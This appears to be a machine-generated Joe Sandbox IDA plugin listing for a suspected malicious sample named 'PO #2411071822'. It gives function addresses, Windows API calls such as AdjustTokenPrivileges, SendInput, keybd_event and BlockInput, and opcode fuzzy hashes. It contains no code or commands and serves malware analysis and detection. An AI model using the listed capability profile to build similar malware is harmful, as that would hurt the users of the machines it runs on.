                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Internet$AvailableDataFileQueryRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 599397726-0
                                                                                                              • Opcode ID: 1b37dc00a85493f61e25ae9c26eff3725566f51ddc9db14888688a1760dcf0bf
                                                                                                              • Instruction ID: 583fe7a5f3d21b25436685b45e9c6857a6f176907a3bf8fc9329545e43269081
                                                                                                              • Opcode Fuzzy Hash: 1b37dc00a85493f61e25ae9c26eff3725566f51ddc9db14888688a1760dcf0bf
                                                                                                              • Instruction Fuzzy Hash: 4E411B71604209BFEB10DE81DC81EFF77BCEB84359F14102FF60566280EA79AE4196A9
                                                                                                              Function 003E77B0 Relevance: 4.6, APIs: 1, Strings: 1, Instructions: 1076COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _memmove
                                                                                                              • String ID: \QI
                                                                                                              • API String ID: 4104443479-910662631
                                                                                                              • Opcode ID: 7a6983fe8b7939cb964c756656ce643175ab36f3a64ac14c6f2901e2849329ce
                                                                                                              • Instruction ID: da7d420321f806c459eafd711e4ffdeab133b960df32fb86c43f1a37e9d683f4
                                                                                                              • Opcode Fuzzy Hash: 7a6983fe8b7939cb964c756656ce643175ab36f3a64ac14c6f2901e2849329ce
                                                                                                              • Instruction Fuzzy Hash: FAA28E74D04269DFCB25CF59C4806ADBBB1FF48310F2582AAE859AB391E7349E81CF45
                                                                                                              Function 0042E1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0042E20D
                                                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0042E267
                                                                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0042E2B4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorMode$DiskFreeSpace
                                                                                                              • String ID:
                                                                                                              • API String ID: 1682464887-0
                                                                                                              • Opcode ID: 60f55c0c87e3a6841f138d2534be703be4a9f2c9ac6a27650d0d278192cfee75
                                                                                                              • Instruction ID: 3b740b5674bb1d8c06495429394cc44af8b56e8b36f545c8d4bec15f4da68d88
                                                                                                              • Opcode Fuzzy Hash: 60f55c0c87e3a6841f138d2534be703be4a9f2c9ac6a27650d0d278192cfee75
                                                                                                              • Instruction Fuzzy Hash: EA216D35A00118EFCB00EFA5D884AEEBBB8FF49314F0584AAE905AB391DB719905CB54
                                                                                                              Function 0041B134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 003FF4EA: std::exception::exception.LIBCMT ref: 003FF51E
                                                                                                                • Part of subcall function 003FF4EA: __CxxThrowException@8.LIBCMT ref: 003FF533
                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0041B180
                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0041B1AD
                                                                                                              • GetLastError.KERNEL32 ref: 0041B1BA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                              • String ID:
                                                                                                              • API String ID: 1922334811-0
                                                                                                              • Opcode ID: e9eaa7de5c7b0ce5bede4eefe698085f74f936817d14b5fac1b02fe600947768
                                                                                                              • Instruction ID: 0b597e77764c90908d5ac53e287756cfb7395092f6aa314122182ad74b09e116
                                                                                                              • Opcode Fuzzy Hash: e9eaa7de5c7b0ce5bede4eefe698085f74f936817d14b5fac1b02fe600947768
                                                                                                              • Instruction Fuzzy Hash: 4911BFB1900205BFE7189F64DC85D6BB7ACEF44354B21852EE85A97240EB74FC418A64
                                                                                                              Function 00426606 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00426623
                                                                                                              • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00426664
                                                                                                              • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0042666F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseControlCreateDeviceFileHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 33631002-0
                                                                                                              • Opcode ID: d08dd2dabcefc3fcb1c6beafc2d24b59c252e258b43eb5f906d6fe2537f96bf9
                                                                                                              • Instruction ID: 0bb6586ea214eda299db8ceb1f34146b2f7aecaa66bf47e80e96d0c40a867051
                                                                                                              • Opcode Fuzzy Hash: d08dd2dabcefc3fcb1c6beafc2d24b59c252e258b43eb5f906d6fe2537f96bf9
                                                                                                              • Instruction Fuzzy Hash: C9111271E01228BFDB108F99DC45BAFBBBCEB45B10F104166F900E6290D7B45A058BA5
                                                                                                              Function 004271FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00427223
                                                                                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0042723A
                                                                                                              • FreeSid.ADVAPI32(?), ref: 0042724A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                              • String ID:
                                                                                                              • API String ID: 3429775523-0
                                                                                                              • Opcode ID: 7ca47ee7f9443343dde52dc21fb44658c81008c127e471dd80b4e99ab39d42db
                                                                                                              • Instruction ID: df5eddc935be5694b990d139a66bbf2ed798a7daa5210542f58f3544cdc00861
                                                                                                              • Opcode Fuzzy Hash: 7ca47ee7f9443343dde52dc21fb44658c81008c127e471dd80b4e99ab39d42db
                                                                                                              • Instruction Fuzzy Hash: 23F01D76F04209FFDF04DFE4DD99AEEBBB8EF08205F504469E602E2191E2749A448B15
                                                                                                              Function 0042F56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0042F599
                                                                                                              • FindClose.KERNEL32(00000000), ref: 0042F5C9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                              • String ID:
                                                                                                              • API String ID: 2295610775-0
                                                                                                              • Opcode ID: a7d32eda4f55f7840694330255f965f6df1ebfe3adb1adba1a0d8f8cb12a253a
                                                                                                              • Instruction ID: f1e835a66e762dfac59587b2f03bbabc14d2b65bca859e23ff36534f688696a9
                                                                                                              • Opcode Fuzzy Hash: a7d32eda4f55f7840694330255f965f6df1ebfe3adb1adba1a0d8f8cb12a253a
                                                                                                              • Instruction Fuzzy Hash: AD11C4316006149FD710EF29D845A2EB3E8FF85324F41892EF9A5DB3D1DB74AD058B85
                                                                                                              Function 0042CE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0043BE6A,?,?,00000000,?), ref: 0042CEA7
                                                                                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0043BE6A,?,?,00000000,?), ref: 0042CEB9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorFormatLastMessage
                                                                                                              • String ID:
                                                                                                              • API String ID: 3479602957-0
                                                                                                              • Opcode ID: 95e1bf61c3f5532f49ef1e866d949fe787335748460394e639b61e0fba56d7f8
                                                                                                              • Instruction ID: 5ea4b36e52492ee59654223f58f4156c553c8f2f6e3adc2ffe15b9fe1d3cb6c5
                                                                                                              • Opcode Fuzzy Hash: 95e1bf61c3f5532f49ef1e866d949fe787335748460394e639b61e0fba56d7f8
                                                                                                              • Instruction Fuzzy Hash: D6F08231600239ABDB20ABA5DC89FEE776DBF08351F008166F919D6181D7749A44CBA5
                                                                                                              Function 0042411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00424153
                                                                                                              • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00424166
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InputSendkeybd_event
                                                                                                              • String ID:
                                                                                                              • API String ID: 3536248340-0
                                                                                                              • Opcode ID: df6e5c87e6064cafd80c7803b474057d137cc0ae16f76277ff5a4ab46b8141ea
                                                                                                              • Instruction ID: afac286a4dcff201d6af75bbb8cb8f0b569aa303320b61e4bd4244a84f983fe8
                                                                                                              • Opcode Fuzzy Hash: df6e5c87e6064cafd80c7803b474057d137cc0ae16f76277ff5a4ab46b8141ea
                                                                                                              • Instruction Fuzzy Hash: 50F06D7090024DAFDB058FA0C809BBE7BB0EF04305F00801AF96696191D7B986129FA9
                                                                                                              Function 0041AB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0041ACC0), ref: 0041AB99
                                                                                                              • CloseHandle.KERNEL32(?,?,0041ACC0), ref: 0041ABAB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                              • String ID:
                                                                                                              • API String ID: 81990902-0
                                                                                                              • Opcode ID: 960593f57473e6f5039bf24dc3711059173615b670d5c200f6b73a98e18e8712
                                                                                                              • Instruction ID: 4eab5c25359001bc37a2b5e10e8784dc1016e3299e2e213180da35add93036e8
                                                                                                              • Opcode Fuzzy Hash: 960593f57473e6f5039bf24dc3711059173615b670d5c200f6b73a98e18e8712
                                                                                                              • Instruction Fuzzy Hash: A8E08631400510AFE7222F14EC04D7377E9EF003207108439F95D80430D7626CD0DB50
                                                                                                              Function 004081AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00406DB3,-0000031A,?,?,00000001), ref: 004081B1
                                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 004081BA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                              • String ID:
                                                                                                              • API String ID: 3192549508-0
                                                                                                              • Opcode ID: c14e6fccb7338cc0d4ca3dd942bedcef60ee94bc9162481c82c5a1853773e743
                                                                                                              • Instruction ID: 140bf008e09df41ea61ac41b16eb64d89e6194adce157672ffd6d1935c81102b
                                                                                                              • Opcode Fuzzy Hash: c14e6fccb7338cc0d4ca3dd942bedcef60ee94bc9162481c82c5a1853773e743
                                                                                                              • Instruction Fuzzy Hash: 70B09231A44608ABDB002BA2EC09B587F68EB08652F004030FA0D44261ABB254908A9B
                                                                                                              Function 003F3200 Relevance: 2.2, Strings: 1, Instructions: 986COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: BuffCharUpper
                                                                                                              • String ID: J
                                                                                                              • API String ID: 3964851224-3887863984
                                                                                                              • Opcode ID: 41e229388b511012688d0d724aed57131f13e5891981328e446e99b1c4dba3e3
                                                                                                              • Instruction ID: f152ca6a6a0b4bdbf491c04471eedb32ff655715ba6ae36efa46a3a05d85028c
                                                                                                              • Opcode Fuzzy Hash: 41e229388b511012688d0d724aed57131f13e5891981328e446e99b1c4dba3e3
                                                                                                              • Instruction Fuzzy Hash: 4692AB70608345DFD725DF19C490B2AB7E4BF88304F14885EEA8A8B3A2D775ED49CB52
                                                                                                              Function 0040D1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d20af1f74676f3287ef03ffa24f9ac5ab079f6e10a696da1a579eb72e1d17159
                                                                                                              • Instruction ID: af081db480512505c724a0f5ff593570e452ba82bf78567d23da938d8614baaf
                                                                                                              • Opcode Fuzzy Hash: d20af1f74676f3287ef03ffa24f9ac5ab079f6e10a696da1a579eb72e1d17159
                                                                                                              • Instruction Fuzzy Hash: BA323662D29F014DD7279634CA22336A288EFB73C5F15D737E819B5AA6EB39C4C34105
                                                                                                              Function 003E96C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __itow__swprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 674341424-0
                                                                                                              • Opcode ID: a77acbc62a55a8c5662c2645a46591ec4308bf0369c4770c10eed0b713d8aa72
                                                                                                              • Instruction ID: fbaac211f22a3d16a610a36513f4afc3a03939842f1fc87403b20f55b65ee099
                                                                                                              • Opcode Fuzzy Hash: a77acbc62a55a8c5662c2645a46591ec4308bf0369c4770c10eed0b713d8aa72
                                                                                                              • Instruction Fuzzy Hash: E622DE716083519FC726DF15C880B6FB7E4BF84304F104A2EF99A9B292DB74E944CB82
                                                                                                              Function 0041038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 61ce71ffdf9bd3530fd53cdfd09480b5795d03b966fea264cf235c8ca35ca4e0
                                                                                                              • Instruction ID: 1fa225afbfd43ff9a2f394862e2990f56bbf73b72fe14dc79102e97276190621
                                                                                                              • Opcode Fuzzy Hash: 61ce71ffdf9bd3530fd53cdfd09480b5795d03b966fea264cf235c8ca35ca4e0
                                                                                                              • Instruction Fuzzy Hash: 23B1D120D2AF814DD22396398931336B65CBFBB2D5B91D72BFC1A74D62EB6185C34184
                                                                                                              Function 0042B6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __time64.LIBCMT ref: 0042B6DF
                                                                                                                • Part of subcall function 0040344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0042BDC3,00000000,?,?,?,?,0042BF70,00000000,?), ref: 00403453
                                                                                                                • Part of subcall function 0040344A: __aulldiv.LIBCMT ref: 00403473
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Time$FileSystem__aulldiv__time64
                                                                                                              • String ID:
                                                                                                              • API String ID: 2893107130-0
                                                                                                              • Opcode ID: cf54343021d57a9eb885cbad13b2036cf807b57da1091aa16c89737bcc65a415
                                                                                                              • Instruction ID: bf3cd4ca5a7c47aaeea5da6201342981618fc90b45545d053036b3914f4a26de
                                                                                                              • Opcode Fuzzy Hash: cf54343021d57a9eb885cbad13b2036cf807b57da1091aa16c89737bcc65a415
                                                                                                              • Instruction Fuzzy Hash: 4E21A2726345108BCB29CF28D881A52F7E1EB95311B648E7DE4E5CB2C0DB78B905CB98
                                                                                                              Function 00436AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • BlockInput.USER32(00000001), ref: 00436ACA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: BlockInput
                                                                                                              • String ID:
                                                                                                              • API String ID: 3456056419-0
